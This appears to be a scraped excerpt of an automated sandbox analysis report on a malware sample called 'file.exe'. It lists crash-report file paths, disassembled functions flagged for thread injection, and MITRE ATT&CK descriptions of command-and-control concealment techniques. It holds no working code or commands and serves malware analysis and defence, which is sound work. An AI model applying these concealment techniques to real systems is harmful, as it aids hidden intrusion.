C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_6fc0c6414e325294145af42a306ed092fe2ab813_fef88e97_35b9d2f3-f8fe-4576-80ac-97efb64f4355\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREBF6.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERED20.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERED4F.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Windows Analysis Report
file.exe

Function 024F7F41 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 024F80BE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 023628C1 Relevance: 1.7, APIs: 1, Instructions: 219
memoryCOMMON

Function 023606E0 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 0043D0D0 Relevance: 32.5, APIs: 11, Strings: 7, Instructions: 957
memorycomCOMMON

Function 0040E16E Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 345
COMMON

Function 00421B30 Relevance: 9.3, Strings: 7, Instructions: 527
COMMON

Function 00408A60 Relevance: 7.7, APIs: 5, Instructions: 216
threadCOMMON

Function 0042F716 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 366
COMMON

Function 0042FB7D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327
COMMON

Function 0040C080 Relevance: 6.4, Strings: 5, Instructions: 104
COMMON

Function 00425713 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 346
COMMON

Function 00437C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181
COMMON

Function 00418BA2 Relevance: 5.4, Strings: 4, Instructions: 367
COMMON

Function 00428750 Relevance: 4.1, Strings: 3, Instructions: 328
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre